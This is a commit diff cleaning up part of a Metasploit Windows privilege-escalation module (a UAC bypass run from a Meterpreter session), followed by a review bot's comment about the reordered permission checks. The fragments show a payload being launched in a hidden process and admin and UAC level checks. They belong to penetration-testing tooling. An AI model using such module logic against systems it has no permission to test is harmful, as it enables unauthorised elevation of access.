code cleanup

GSoC/Meterpreter_Web_Console
bwatters-r7 2018-05-23 12:53:48 -05:00
parent 3ef6f82894
commit 77403479f5
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
1 changed files with 13 additions and 19 deletions


@ -50,8 +50,8 @@ class MetasploitModule < Msf::Exploit::Local
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
['Windows x86', { 'Arch' => ARCH_X86 }],
['Windows x64', { 'Arch' => ARCH_X64 }]
],
'DefaultTarget' => 0,
'References' => [
@ -74,6 +74,10 @@ class MetasploitModule < Msf::Exploit::Local
end
def exploit
# Validate that we can actually do things before we bother
# doing any more work
check_permissions!
commspec = 'powershell'
registry_view = REGISTRY_VIEW_NATIVE
psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
@ -104,10 +108,6 @@ class MetasploitModule < Msf::Exploit::Local
fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
end
# Validate that we can actually do things before we bother
# doing any more work
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
@ -157,11 +157,11 @@ class MetasploitModule < Msf::Exploit::Local
print_status("Executing payload: #{cmd_path} #{cmd_args}")
# We can't use cmd_exec here because it blocks, waiting for a result.
client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })
client.sys.process.execute(cmd_path, cmd_args, 'Hidden' => true)
# Wait a copule of seconds to give the payload a chance to fire before cleaning up
# TODO: fix this up to use something smarter than a timeout?
Rex::sleep(3)
sleep(3)
handler(client)
@ -178,21 +178,15 @@ class MetasploitModule < Msf::Exploit::Local
end
def check_permissions!
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
end
unless is_in_admin_group?
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
# is_in_admin_group can be nil, true, or false
print_status('UAC is Enabled, checking level...')
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
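Review bot: In `check_permissions!` (last hunk), `print_status('UAC is Enabled, checking level...')` now seems to run before `is_in_admin_group?` is called and before anything reads a UAC level, so the log reports a state the method has not established; it would sit better immediately above `case get_uac_level` in `exploit`. The page has lost its +/- markers, so this ordering is inferred from the 13 additions / 19 deletions count rather than read directly. Dropping the `unless is_in_admin_group?` guard also appears to make the `admin_group.nil?` branch reachable for the first time, since a nil result was falsy and previously ended in `fail_with(Failure::NoAccess, ...)`; that is a behaviour change rather than cleanup, and deserves a line in the commit message plus a comment such as `# nil: membership could not be determined, so the run continues unverified`. The method body continues past the end of the hunk.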